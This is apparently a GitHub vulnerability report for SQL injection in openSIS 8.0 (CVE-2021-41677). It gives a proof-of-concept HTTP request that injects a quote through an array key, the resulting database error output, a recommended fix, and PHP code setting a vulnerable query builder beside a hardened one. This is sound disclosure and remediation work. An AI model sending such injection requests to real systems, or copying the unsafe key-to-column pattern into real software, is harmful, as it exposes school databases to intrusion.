CVE-2021-41677: SQL injection in multiple functions · Issue #202 · OS4ED/openSIS-Classic
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can inject SQL through the `Grade` parameter of /opensis/functions/GetStuListFnc.php.
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can inject SQL through the `values[new][MP_TYPE]` parameter of /opensis/modules/grades/EditHistoryMarkingPeriods.php; the array key (the column name), not only the value, reaches the query unfiltered.
POC:
REQUEST:
```http
POST /Modules.php?modname=grades/EditHistoryMarkingPeriods.php&modfunc=update&tab_id=&mp_id= HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=eligibility/TeacherCompletion.php&LO_direction=1&portal_search=true&LO_search=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

values[new][MP_'TYPE]=year&values%5Bnew%5D%5BNAME%5D=q&month_values%5Bnew%5D%5BPOST_END_DATE%5D=09&day_values%5Bnew%5D%5BPOST_END_DATE%5D=01&year_values%5Bnew%5D%5BPOST_END_DATE%5D=2021&values%5Bnew%5D%5BSYEAR%5D=2008
```
RESPONSE:
```http
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
<pre> DB Execute Failed </pre></TD>
</TR><TR>
<TD align=right><b>SQL:</b></TD>
<TD>INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, MP_'TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/modules/grades/EditHistoryMarkingPeriods.php at 92</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')' at line 1</TD>
</TR>
[…]
```
SOLUTION:
Pass the request array through sqlSecurityFilter() before the foreach loop iterates over it, so that both the keys (column names) and the values are filtered:
`foreach (sqlSecurityFilter($_REQUEST['values']) as $id => $columns)`
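The trace above shows why filtering the value alone is not enough: the array key becomes the column name in the INSERT. The following is an added example, not openSIS code, that reproduces that pattern and sets beside it a hardened version using an allow-list of column names plus bound values (an alternative to sqlSecurityFilter()); `buildInsertUnsafe`, `buildInsertSafe` and `ALLOWED_COLUMNS` are illustrative names, the table and column names come from the trace.

```php
<?php
// Added example (not openSIS code). Helper names are illustrative;
// table/column names are taken from the failing INSERT in the report.

// Constructed input: what the POST body values[new][MP_'TYPE]=year&... decodes to.
$request = [
    'values' => [
        'new' => [
            "MP_'TYPE" => 'year',   // attacker-controlled array KEY, not value
            'NAME'     => 'q',
            'SYEAR'    => '2008',
        ],
    ],
];

// Vulnerable pattern: request keys are interpolated as column names.
// Escaping the values does not help; the key is what breaks the statement.
function buildInsertUnsafe(array $columns): string {
    $names = implode(',', array_keys($columns));
    $vals  = "'" . implode("','", array_map('addslashes', $columns)) . "'";
    return "INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, $names)"
         . " values(40, 1, $vals)";
}
// buildInsertUnsafe($request['values']['new']) yields the same broken SQL as
// the trace: "... SCHOOL_ID, MP_'TYPE,NAME,SYEAR) values(40, 1, 'year','q','2008')".

// Hardened: column names must match a fixed allow-list; values are bound.
const ALLOWED_COLUMNS = ['MP_TYPE', 'NAME', 'SYEAR', 'POST_END_DATE'];

function buildInsertSafe(array $columns): array {
    $names  = [];
    $params = [];
    foreach ($columns as $name => $value) {
        // Strict comparison: "MP_'TYPE" is rejected here instead of reaching the DB.
        if (!in_array($name, ALLOWED_COLUMNS, true)) {
            throw new InvalidArgumentException("Unexpected column: $name");
        }
        $names[]  = $name;
        $params[] = $value;
    }
    $placeholders = implode(',', array_fill(0, count($names), '?'));
    $sql = 'INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, '
         . implode(',', $names) . ') VALUES (?, ?, ' . $placeholders . ')';
    return [$sql, array_merge([40, 1], $params)];
}

// Usage with a PDO connection ($pdo assumed to exist):
// [$sql, $params] = buildInsertSafe($request['values']['new']);  // throws on the PoC input
// $pdo->prepare($sql)->execute($params);
```

With the constructed PoC input, buildInsertSafe() throws before any query is built; with well-formed keys it returns a parameterised statement in which no request data is part of the SQL text.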